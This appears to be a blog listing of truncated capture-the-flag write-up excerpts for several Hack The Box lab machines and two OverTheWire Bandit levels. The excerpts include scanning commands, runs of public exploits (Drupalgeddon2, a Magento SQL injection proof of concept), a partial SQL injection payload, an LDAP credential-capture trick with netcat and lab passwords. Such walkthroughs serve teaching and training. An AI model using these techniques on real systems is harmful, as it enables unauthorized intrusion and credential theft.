CTFs

HTB Pennyworth

We continue with another very easy HTB box.
$ nmap -p- 10.129.243.77 -sV --min-rate 5000
Here we have a Jetty 9.4.39.v20210325. Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/
If we go to http://10.129.243.77:8080, we'll be redirected to http://10.129.243.77:8080/login?from=%2F
This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

HTB Bike

This is another of the HTB Starting Point's very easy boxes.
$ nmap -v -p- -sV 10.129.237.207 --min-rate 5000
Access to http://10.129.237.207/
According to the Nmap scan, the site runs under Node.js. Wappalyzer describes the web framework as Express. There is no validation of the email address input: in fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

HTB Ignition

This is another of the very easy HTB Starting Point boxes.
$ sudo nano /etc/hosts
$ nmap -p- -A 10.129.232.211 -sV
Access to http://ignition.htb/
$ dirsearch -u http://ignition.htb -i 200
Access to http://ignition.htb/admin/
Based on the HTB questions, the username is admin. As there is a form_key parameter, it is more difficult to brute-force. So, we can try to guess the password manually using the most common passwords. We can find more

HTB Redeemer

This is one of the HTB Starting Point boxes. It is rated as very easy and only has 1 flag.
$ nmap -p- -A 10.129.216.146 --min-rate 5000
So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 --min-rate 5000
Site inspection: http://10.10.10.233/
$ whatweb http://10.10.10.233
We are facing a Drupal 7 CMS.
$ dirsearch -u http://10.10.10.233/ -i 200
http://10.10.10.233/includes/bootstrap.inc
Specifically, it is a Drupal v7.56. Let's see if this Drupal version has some vulnerability.
CVE-2018-7600
https://github.com/dreadlocked/Drupalgeddon2
$ git clone https://github.com/dreadlocked/Drupalgeddon2.git
$ ruby drupalgeddon2.rb http://10.10.10.233
armageddon.htb>> whoami
armageddon.htb>> pwd
armageddon.htb>> ls /var/www/html/sites -la
armageddon.htb>> ls /var/www/html/sites/default -la
armageddon.htb>> cat /var/www/html/sites/default/settings.php
Mysql password = CQHEy@9M*m23gBVj

HTB GoodGames

$ nmap -sV -p- goodgames.htb --min-rate 5000
http://goodgames.htb/
We can test if this site is vulnerable to an SQL injection. If we just add a ', we can reach the login page with a registration form.
http://internal-administration.goodgames.htb/
We don't have credentials for this site, but as we've confirmed there is an SQL injection, let's try to exploit it. First, we need to know how many columns exist.
email=admin%40test.com' union all

HTB Swagshop

$ nmap -p- -sV 10.10.10.140
$ sudo nano /etc/hosts
Access to http://swagshop.htb/
As we are facing a Magento, we can use Magescan to check it.
$ wget https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar
$ php magescan.phar scan:all http://swagshop.htb
From the magescan report, looking at the patches section, the first one is SUPEE-5344.
https://magento.com/security/patches/supee-5344-%E2%80%93-shoplift-bug-patch
https://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.html
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
With this PoC, you should be able to add an admin user.
$ python3 poc.py swagshop.htb
Access to http://swagshop.htb/index.php/admin
The "Froghopper" Attack After

HTB Return

$ nmap -sV -p- 10.10.11.108 -Pn --min-rate 5000
http://10.10.11.108/
http://10.10.11.108/settings.php
If we add our IP into the Server Address field:
$ sudo nc -lvnp 389
We get a connection and the svc-printer password.
svc-printer:1edFg43012!!
You can read more about this technique here. According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Bandit CTF – Level 23

Level 22 -> 23
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ ls
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
bandit22@bandit:/etc/cron.d$ whoami
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
password = jc1uXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 22

Level 21 -> 22
bandit21@bandit:/etc/cron.d$ ls
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
bandit21@bandit:/tmp$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Password = Yk7oXXXXXXXXXXXXXXXXXXXXXXXXXXXX